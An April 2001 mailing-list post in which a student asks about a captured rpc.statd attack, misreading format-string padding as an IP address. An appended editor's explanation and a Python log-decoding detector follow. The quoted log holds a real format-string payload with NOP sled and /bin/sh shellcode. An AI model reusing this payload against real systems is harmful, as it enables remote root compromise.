[techtalk] Should I feel honored?
Kath
ranger at optonline.net
Fri Apr 20 17:39:38 EST 2001
I decided to review my own logs (I know I should do it more often).
Apparently, my web server has been attacked repeatedly and, if the IP is true (if I am reading it right; maybe it is just mumbo jumbo I'm misinterpreting), it is coming from USC.
Here is the log:
Apr 18 15:25:08 hwnet /sbin/rpc.statd[177]: gethostbyname error for ^X\xf7\xff\xbf^X\xf7\xff\xbf^Y\xf7\xff\xbf^Y\xf7\xff\xbf^Z\xf7\xff\xbf^Z\xf7\xff\xbf^[\xf7
\xff\xbf^[\xf7\xff\xbf%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
Apr 18 15:25:08 hwnet \xc7^F/bin\xc7F^D/shA0\xc0\210F^G\211v^L\215V^P\215N^L\211\xf3\xb0^K\xcd\200\xb0^A\xcd\200\xe8\177\xff\xff\xff
Now, if I am not reading too much into it, I clearly see the IP "236x%n%137x%n%10x%n%192". Does that mean 236.137.10.192?
Now popping that IP into the whois at arin.net yielded this:
University of Southern California (NET-MCAST-NET)
Information Sciences Institute
4676 Admiralty Way
Marina Del Rey, CA 90292-6695
US
Netname: MCAST-NET
Netblock: 224.0.0.0 - 239.255.255.255
Coordinator:
Internet Corporation for Assigned Names and Numbers (IANA-ARIN) iana at IANA.ORG
(310) 823-9358
Domain System inverse mapping provided by:
FLAG.EP.NET 198.32.4.13
STRUL.STUPI.SE 192.108.200.1 192.36.143.3
NS.ISI.EDU 128.9.128.127
NIC.NEAR.NET 192.52.71.4
Record last updated on 12-Sep-2000.
Database last updated on 20-Apr-2001 00:14:29 EDT.
Could it be a spoofed address? A compromised machine doing the scanning? Some script kiddy kid sitting in his dorm room?
What is my course of action now? My main page hasn't been defaced with pictures of someone's grandma in compromising poses, so I guess that is a good first sign the attack didn't work? Or did it work, and my machine has been compromised and is now being used for DDoS or a w4r3z Britney Spears mp3 porn server?
I will notify the sysadmin of my school district (I'm a student) of this of course.
If that IP is true, should I be contacting a USC sysadmin? I would feel especially responsible if it was some poor sysadmin's compromised machine at another school.
- Kath, the perpetually worried
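Editor's note on reading that log, with an added example (not code from the original post, and not part of rpc.statd or any exploit kit). What rpc.statd logged is the classic format-string attack against its syslog call: `^X\xf7\xff\xbf` is the little-endian stack address 0xbffff718 (caret notation `^X` is byte 0x18), the `%8x` conversions walk up the stack, and `%236x%n%137x%n%10x%n%192x%n` is not an address at all: the numbers are field widths that pad the output so each `%n` stores a chosen byte count into the address it points at. The long run of `\220` is a NOP sled (0x90) and the second line is the shellcode (`/bin` `/sh`, `\xcd\200` = `int 0x80`). The source IP is simply not in this message; 236.137.10.192 falls inside 224.0.0.0/4, which is why ARIN returned the whole IANA multicast block, and a multicast address can never be a sender. To find the attacker you need something that records the client address (a packet capture, firewall or router logs, or portmap/inetd logging), not the statd message. The script below turns the escaped text back into bytes and flags these indicators. The sample lines are constructed (shortened copies of the quoted entries plus one benign line); the byte counts it reports are minimums relative to the start of the syslog message body, since a real `%x` may print more than its field width.

```python
"""Decode syslog escaping and flag format-string / shellcode indicators.

Added example for this thread (not from the original post or from rpc.statd).
SAMPLE_LOG is constructed: shortened forms of the entries quoted above plus a
benign line for contrast.
"""
import re
import struct

# syslogd and the mail wrapper render non-printable bytes three ways in the
# quoted log: \xHH, \ooo (octal) and caret notation (^X is 0x18, ^[ is ESC).
_TOKEN = re.compile(r'\\x([0-9a-fA-F]{2})|\\([0-7]{3})|\^([@A-Z\[\\\]^_])|(.)', re.S)
_SYSLOG = re.compile(r'^(\w{3} +\d+ \d\d:\d\d:\d\d) (\S+) (.*)$', re.S)
_SPEC = re.compile(rb'%(\d*)([xXdiucspn])')

SAMPLE_LOG = [
    # Constructed: shortened form of the rpc.statd line in the post
    (r"Apr 18 15:25:08 hwnet /sbin/rpc.statd[177]: gethostbyname error for "
     r"^X\xf7\xff\xbf^X\xf7\xff\xbf^Y\xf7\xff\xbf^Y\xf7\xff\xbf"
     r"%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n" + r"\220" * 40),
    # Constructed: the shellcode continuation line as quoted
    r"Apr 18 15:25:08 hwnet \xc7^F/bin\xc7F^D/shA0\xc0\210F^G\211v^L\215V^P\215N^L\211\xf3\xb0^K\xcd\200\xb0^A\xcd\200\xe8\177\xff\xff\xff",
    # Constructed benign line (hostname is hypothetical)
    "Apr 18 15:30:01 hwnet /sbin/rpc.statd[177]: gethostbyname error for nfs-client.example.org",
]


def decode_escapes(text: str) -> bytes:
    """Turn escaped syslog text back into the raw bytes the daemon logged."""
    out = bytearray()
    for hexv, octv, caret, lit in _TOKEN.findall(text):
        if hexv:
            out.append(int(hexv, 16))
        elif octv:
            out.append(int(octv, 8))
        elif caret:
            out.append(ord(caret) - 0x40)   # ^X -> 0x18, ^[ -> 0x1b
        else:
            out.extend(lit.encode('latin-1'))
    return bytes(out)


def analyze(message: bytes) -> dict:
    """Measure format-string and shellcode indicators in one message body."""
    head, _, _ = message.partition(b'%')
    # Little-endian 0xbfffXXXX words ahead of the first '%' are the addresses
    # the %n conversions will write to (Linux/x86 stack addresses of the era).
    targets = []
    for m in re.finditer(rb'..\xff\xbf', head, re.S):
        addr = struct.unpack('<I', m.group(0))[0]
        if addr not in targets:
            targets.append(addr)
    # Each %n stores the number of bytes printed so far; the %Nx widths before
    # it are padding chosen to set that number. Track the minimum (field widths
    # only) relative to the start of the message body.
    printed = len(head)
    n_values = []
    for width, conv in _SPEC.findall(message):
        if conv == b'n':
            n_values.append(printed)
        else:
            printed += int(width or 0)
    nop_sled = max((len(r) for r in re.findall(rb'\x90+', message)), default=0)
    shell = [s.decode() for s in (b'/bin', b'/sh') if s in message]
    int80 = b'\xcd\x80' in message          # int 0x80, Linux x86 syscall
    if n_values:
        verdict = 'format-string attack'
    elif int80 or nop_sled >= 16 or shell:
        verdict = 'shellcode'
    else:
        verdict = 'clean'
    return {'verdict': verdict, 'n_writes': len(n_values), 'n_min_values': n_values,
            'write_targets': [f'{t:#x}' for t in targets], 'nop_sled': nop_sled,
            'shell_strings': shell, 'int80': int80}


def scan(lines):
    """Parse syslog lines; return (timestamp, host, findings) for each."""
    results = []
    for line in lines:
        m = _SYSLOG.match(line)
        if not m:
            continue
        ts, host, body = m.groups()
        results.append((ts, host, analyze(decode_escapes(body))))
    return results


if __name__ == '__main__':
    for ts, host, findings in scan(SAMPLE_LOG):
        print(ts, host, findings)
```

Running it on the two quoted lines reports four `%n` writes aimed at consecutive bytes 0xbffff718, 0xbffff719 (and, in the full log, 0xbffff71a, 0xbffff71b), the 137/10/192 increments between writes, the 0x90 sled, and the `/bin/sh` plus `int 0x80` shellcode; the benign line comes out clean. Nothing in the output is a source address, which is the point: the next step is the packet or firewall logs from Apr 18 15:25, and checking whether rpc.statd on the box is a patched version.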